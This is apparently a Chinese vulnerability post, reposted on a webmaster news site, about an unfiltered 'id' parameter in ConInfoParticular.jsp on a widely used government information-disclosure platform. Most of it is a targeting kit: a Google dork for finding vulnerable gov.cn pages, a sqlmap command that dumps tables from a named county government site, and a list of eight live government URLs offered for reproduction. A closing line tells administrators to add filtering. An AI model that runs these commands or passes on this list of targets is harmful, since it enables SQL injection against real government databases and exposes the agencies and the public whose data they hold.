某通用型政府信息公开平台SQL注入漏洞下载

虽是很简单的注入,但影响的gov很多

1.漏洞存在ConInfoParticular.jsp文件,页面可通过POST、GET方式获取参数id的值,且均未过滤,导致SQL注入漏洞



2.googledork:site:gov.cn inurl:ConInfoParticular.jsp?id

 

http://74.125.235.191/#newwindow=1&q=site:gov.cn+inurl:ConInfoParticular.jsp%3Fid



google搜索结果:约 153,000 条结果

3.以其中静海县政府信息公开网测试:

 

http://gk.tjjh.gov.cn/ConInfoParticular.jsp?id=5367



以get方式测试,post方式一样。

获取tables测试:

 

sqlmap -u "http://gk.tjjh.gov.cn/ConInfoParticular.jsp?id=5367" --dbms "mysql" --tables

4.提供几个站点,方便复现测试:

http://gk.tjjh.gov.cn/ConInfoParticular.jsp?id=5367

http://gk.tjhqqzf.gov.cn/ConInfoParticular.jsp?id=4879

http://info.tjjn.gov.cn/ConInfoParticular.jsp?id=508

http://www.myhack58.com/zfxxgk.bh.gov.cn/ConInfoParticular.jsp?id=1605

http://www.tjnh.gov.cn:7002/ConInfoParticular.jsp?id=2206

http://zwgk.tjhexi.gov.cn:8080/ConInfoParticular.jsp?id=1192

http://gk.tjnk.gov.cn/ConInfoParticular.jsp?id=997

http://xinxigk.baodi.gov.cn/ConInfoParticular.jsp?id=21

………………

应该足够用于复现并体现其通用性了。

赶紧过滤处理下吧

当前位置:站长啦网站目录 » 站长资讯 » 站长新闻 » 漏洞预警 » 文章详细